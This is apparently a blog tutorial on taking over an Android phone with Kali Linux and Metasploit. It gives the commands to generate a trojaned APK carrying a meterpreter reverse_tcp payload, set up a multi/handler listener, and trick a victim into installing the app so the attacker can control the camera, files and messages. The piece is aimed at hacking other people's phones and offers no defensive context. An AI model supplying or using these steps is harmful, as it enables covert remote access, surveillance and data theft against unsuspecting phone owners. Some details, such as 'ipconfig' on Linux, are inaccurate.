How to Hack Android Phone using Kali Linux

Now a days android users are increasing rapidly. There are very few who don’t use Mobile Phones in this era of Technology.With the rapid growth of mobile users the security threat is also at its peak. So, today i am going to tell you a simple method by which you will be able to hack into android phone very easily.This tutorial is exclusively for all those who want to hack android phone.The method explained here is a MetaSploit method which will give you control over victims mobile phone .You will be able to access and control victims camera, file manager, Bluetooth, Messages and many more.

Recommended Reading:  Don't read this if you are planning to blog in future !

Hack android phone

 

In this tutorial i will be using Kali Linux to hack android Phone!

Just Follow the below steps to hack android Phone:

1) Open Terminal and type:

ipconfig

ipconfig

to check your ip address.Here my ip is 192.168.43.203 , which is also the attackers(my) ip address

ip address

2) Now i will be creating a dummy android app that i will sent to the victim.For that just type :

msfpayload android/meterpreter/reverse_tcp

LHOST=attacker_ip_address LPORT=port_to_receive_connection R > Appname.apk

Attacker_ip_address= your ip address that you found out using ipconfig

port_to_receive_connection= 81

dummy android app

 

3) Now while waiting open up new terminal and type

msfconsole

to run the metasploit.

4) Now type

use multi/handler

 metasploit

5) Now you have to type:

 set payload android/meterpreter/reverse_tcp

and then type

set LHOST <Attacker_ip_address>

and then

set LPORT=81

Untitled-5

 

Untitled-6

 

6) Now send the dummy app to the victim..upload it to net or try any other method.

7) Once the victim install the application and runs it ,you will start seeing a session.

Untitled-7

8) That’s it we are in the victims android phone and can whatever we want.Just type help inorder to get the list of commands!